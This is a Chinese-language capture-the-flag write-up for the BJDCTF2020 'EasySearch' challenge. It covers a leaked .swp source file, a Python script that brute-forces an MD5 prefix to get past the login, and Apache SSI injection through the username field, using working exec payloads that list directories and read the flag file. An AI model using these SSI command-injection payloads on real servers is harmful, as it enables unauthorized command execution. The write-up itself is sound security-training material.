[BJDCTF2020]EasySearch
0x00 知识点
Apache SSI 远程命令执行漏洞
链接:
https://www.cnblogs.com/yuzly/p/11226439.html
当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用语法执行命令。
使用SSI(Server Side Include)的html文件扩展名,SSI(Server Side Include),通常称为"服务器端嵌入"或者叫"服务器端包含",是一种类似于ASP的基于服务器的网页制作技术。默认扩展名是 .stm、.shtm 和 .shtml。
敏感文件泄露
index.php.swp
0x01 解题
扫描一下目录,发现.swp备份文件
<?php
ob_start();
function get_hash(){
$chars = '#$%^&*()+-';
$random = $chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)].$chars[mt_rand(0,73)];//Random 5 times
$content = uniqid().$random;
return sha1($content);
}
header("Content-Type: text/html;charset=utf-8");
***
if(isset($_POST['username']) and $_POST['username'] != '' )
{
$admin = '6d0bc1';
if ( $admin == substr(md5($_POST['password']),0,6)) {
echo "<script>alert('[+] Welcome to manage system')</script>";
$file_shtml = "public/".get_hash().".shtml";
$shtml = fopen($file_shtml, "w") or die("Unable to open file!");
$text = '
***
***
<h1>Hello,'.$_POST['username'].'</h1>
***
***';
fwrite($shtml,$text);
fclose($shtml);
***
echo "[!] Header error ...";
} else {
echo "<script>alert('[!] Failed')</script>";
}else
{
***
}
***
?>审计一下:
首先是随机获取文件名的一个函数,最关键的是让password前6个字符的md5加密值等于6d0bc1,然后会在public目录下创建一个shtml文件,再将post传参的username字段写入这个shtml文件中。
首先写个脚本让password前6个字符的md5值等于6d0bc1:
import hashlib
a= "0123456789"
for o in a:
for p in a:
for q in a:
for r in a:
for s in a:
for t in a:
for u in a:
b = str(o)+str(p)+str(q)+str(r)+str(s)+str(t)+str(u)
md5 = hashlib.md5(b.encode('utf-8')).hexdigest()
if ((md5[0:6])=='6d0bc1'):
print b![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPmsZaVOkUNQSVv-kDXFdVdg.png "[BJDCTF2020]EasySearch")
随便选一个登陆![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPzMxepqAE6vMj9-eROikE5Q.png "[BJDCTF2020]EasySearch")
看到返回包中会生成一个后缀为.shtml文件,(并将用户名写入文件中)
还有这个文件的路径
我们访问![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVP4hfGXjzhCoywgPDXhMR_ow.png "[BJDCTF2020]EasySearch")
利用SSI注入漏洞,我们可以在username变量中传入ssi语句来远程执行系统命令。
<!--#exec cmd="命令"-->
首先ls一下当前目录:
<!--#exec cmd="ls"-->
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPc_ENKCbBzzdnWEM7pmFYag.png "[BJDCTF2020]EasySearch")
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPBNuNw4lxtWuYgA_b-Qn3TA.png "[BJDCTF2020]EasySearch")
flag不在这个目录,我们返回上一个目录看看
<!--#exec cmd="ls ../"-->
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPCDn2t965Kjfp-WZGWhNJDA.png "[BJDCTF2020]EasySearch")
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPD2_IfaWxF-4Ektfd2vlAbg.png "[BJDCTF2020]EasySearch")
继续构造
<!--#exec cmd="cat ../flag_990c66bf85a09c664f0b6741840499b2"-->
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPwZ3gJK5nONagFsYG1qF95w.png "[BJDCTF2020]EasySearch")
![[BJDCTF2020]EasySearch](https://cdn.ancii.com/article/image/v1/sw/wV/kP/PkwwVsGDmjDG9swnOi7SkjVAsMQAarn73E9S3mmSmcAiK7IMHbxkN6Kj_kh8rIVPTDiRBVjJgzo2i3YIBejVhQ.png "[BJDCTF2020]EasySearch")
相关推荐
STPace 2020-06-20
huzijia 2020-06-16
pythonclass 2019-12-30
机器猫不吃鱼 2007-11-06
爱好HtmlCssJs 2019-11-05
叶显明 2009-11-24
ITBUG 2016-05-04
appteamvlctech 2012-11-12
zestroly 2014-07-21
loverlucky 2010-02-26
Winifred 2015-07-29
linfei0 2016-05-10
yaoliuwei 2016-05-04
覆雪蓝枫 2016-02-20
huakaiwuxing 2015-12-29
VincentDrW 2011-09-16
gaohongijj 2015-10-09
SoarFly00 2014-11-11
liusslove 2010-05-16